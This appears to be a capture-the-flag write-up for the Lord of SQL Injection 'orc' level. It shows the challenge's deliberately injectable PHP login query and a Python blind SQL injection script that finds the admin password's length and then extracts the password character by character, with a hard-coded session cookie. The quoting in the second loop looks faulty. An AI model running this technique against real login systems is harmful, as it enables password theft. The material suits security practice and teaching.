Hello admin

Hello admin

Hello admin

Hello admin
ORC Clear!

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

headers = {'Cookie': 'PHPSESSID=61t8fndiva3hsc837872qbb6t9;'}
url = "<https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php>"
string = "1234567890abcdefghijklmnopqrstuvwxyz"

pw= ""
len = 1

while 1 :
    query = "?pw=' or id='admin' and length(pw) = " + str(len) + "%23"
    r = requests.get(url+query,headers=headers)
    if r.text.find('Hello admin') != -1 :
        break
    len += 1
print ("passwd length : ",len)

for i in range (1,len+1) :
    for j in string :
        query = "?pw=' or pw like \\'" + pw + j + "%"
        r = requests.get(url + query, headers=headers)
        if r.text.find('Hello admin') != -1:
            pw = pw + j
            break

    print ("passwd : ", pw)